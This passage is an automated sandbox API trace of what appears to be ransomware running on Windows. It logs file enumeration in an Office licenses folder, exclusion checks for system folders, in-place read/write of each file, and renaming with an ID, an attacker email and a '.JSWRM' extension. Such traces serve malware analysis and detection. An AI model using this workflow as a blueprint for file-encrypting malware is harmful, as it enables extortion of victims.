lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0104.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0104.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0104.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0104.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.910] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0104.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0104.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.911] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5d11b2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5d11b2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5df6968, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial1-pl.xrm-ms", cAlternateFileName="O3B637~1.XRM")) returned 1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2=".") returned 1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="..") returned 1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="...") returned 1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="windows") returned -1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="recovery") returned -1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.918] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-pl.xrm-ms", lpString2="msocache") returned 1 [0104.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0104.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0104.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0104.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0104.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0104.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.919] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0104.919] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.919] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.921] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.922] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.922] CloseHandle (hObject=0x45c) returned 1 [0104.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0104.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0104.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0104.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0104.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0104.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.922] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.924] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5ceb8e3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5ceb8e3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5dd0763, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial1-ppd.xrm-ms", cAlternateFileName="O32BFF~1.XRM")) returned 1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2=".") returned 1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="..") returned 1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="...") returned 1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="windows") returned -1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.924] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0104.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0104.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0104.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0104.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0104.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0104.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0104.924] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0104.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0104.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.925] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23135) returned 1 [0104.925] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.925] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0104.925] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0104.928] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.928] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0104.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.928] CloseHandle (hObject=0x45c) returned 1 [0104.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0104.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0104.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0104.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0104.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0104.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0104.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.929] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0104.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0104.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.930] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe61b0488, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe61b0488, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6248ddb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d73, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial1-ul-oob.xrm-ms", cAlternateFileName="O3BAC6~1.XRM")) returned 1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.930] lstrcmpiW (lpString1="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0104.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0104.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0104.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.930] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial1-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial1-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0104.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0104.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0104.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0104.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial1-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial1-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.931] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11635) returned 1 [0104.931] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0104.931] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0104.934] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.934] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0104.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.934] CloseHandle (hObject=0x45c) returned 1 [0104.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0104.935] MultiByteToWideChar (in: CodePage=0x0, 